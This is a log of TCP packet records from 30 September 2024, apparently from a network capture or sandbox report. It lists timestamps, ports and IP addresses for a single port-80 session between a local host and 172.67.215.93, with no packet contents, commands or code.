Sep 30, 2024 15:10:13.871071100 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.871583939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.871658087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.871711016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.871779919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.871824026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.871987104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.872211933 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.872452021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.872692108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.872737885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.872755051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.872879982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.873006105 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.873161077 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.873325109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.873380899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.873400927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.873430967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.873753071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.873753071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.874087095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.874131918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.874198914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.874250889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.874727964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.874727964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.874965906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.874988079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.875458002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.875492096 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.875504017 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.875511885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.875658989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.875694990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.875888109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.875888109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.876306057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.876348972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.876368046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.876594067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.876594067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.891768932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.891799927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.891820908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.891838074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.892056942 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.892057896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.101911068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.102066994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.102085114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.102099895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.102135897 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.102305889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.102305889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.102305889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.102370024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.102389097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.102400064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.102643967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.102643967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.104636908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.104657888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.104698896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.104960918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.104960918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.104960918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.104996920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.105165005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.105185986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.105200052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.105293989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.105361938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.105361938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.105545044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.105737925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.106117964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.106136084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.106149912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.106364012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.106456041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.106621981 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.106656075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.106775045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.106832027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.106899023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.107234955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.107234955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.107234955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.107595921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.107616901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.107719898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.107839108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.108170033 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.108191013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.108191013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.108561039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.108596087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.108688116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.108701944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.109107971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.109400034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.109417915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.109509945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.109848976 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.109894037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.110239029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.110277891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.110295057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.110423088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.110528946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.110533953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.110771894 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.110918045 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.111031055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.111125946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.111177921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.111252069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.111361980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.111362934 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.111531973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.111531973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.112123013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.112186909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.112206936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.112221956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.112452030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.112452030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.112781048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.112900972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.112941980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.113008022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.113102913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.113102913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.113322973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.113322973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.113662004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.113759995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.113886118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.113888025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.113908052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.113938093 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.114105940 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.114345074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.114510059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.114682913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.114717960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.114758015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.114773989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.114978075 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.115341902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.115389109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.115454912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.115576982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.115742922 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.115748882 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.115943909 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.116322994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.116365910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.116380930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.116503954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.116833925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.116833925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.116833925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.117178917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.117208958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.117224932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.117285013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.117894888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.117894888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.117927074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.117971897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.118274927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.118633986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.118686914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.118705034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.118719101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.119024038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.119471073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.119498968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.119513988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.119528055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.120069981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.120157957 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.120157957 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.120196104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.120234013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.120349884 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.120372057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.120702982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.120906115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.120975018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.121042013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.121140003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.121320009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.121320009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.121320009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.121658087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.121855974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.121856928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.121916056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.121937037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.122225046 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.122618914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.122662067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.122711897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.122838020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.122906923 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.122906923 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.123075962 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.123418093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.123569012 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.123708010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.123728991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.123795033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.123894930 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.123894930 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.124114037 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.124979019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.125119925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.125129938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.125137091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.125396967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.125511885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.125581980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.125971079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.125971079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.125971079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.127645969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.127660990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.127877951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.127921104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.127944946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.127962112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.127975941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.127989054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128000975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128038883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128074884 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.128211975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128225088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128237963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128248930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128530025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128602028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.128817081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.128817081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.129000902 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.129009962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.129087925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.129118919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.129132986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.129388094 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.129803896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.129893064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.129940033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.129955053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.130017042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.130028009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.130207062 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.130399942 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.130611897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.130712986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.130760908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.130775928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.130973101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.130973101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.131531954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.131587029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.131663084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.131685972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.131880999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.132072926 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.132433891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.132448912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.132544994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.132553101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.132577896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.132746935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.132746935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.133398056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.133440018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.133467913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.133495092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.133584976 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.133794069 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.134377003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.134421110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.134435892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.134897947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.135025024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.135132074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.135195971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.135195971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.135195971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.135195971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.135277033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.135309935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.135417938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.135417938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.135603905 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.135603905 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.135919094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.136039019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.136082888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.136097908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.136193037 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.136408091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.136622906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.136784077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.136809111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.136832952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.137202978 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.137202978 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.137547970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.137569904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.138070107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.138114929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.138153076 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.138153076 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.138341904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.138343096 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.138361931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.138473034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.138487101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.139137983 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.139137983 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.140533924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.140572071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.140589952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.140603065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.140619993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.140634060 CEST	80	49754	172.67.215.93	192.168.11.20
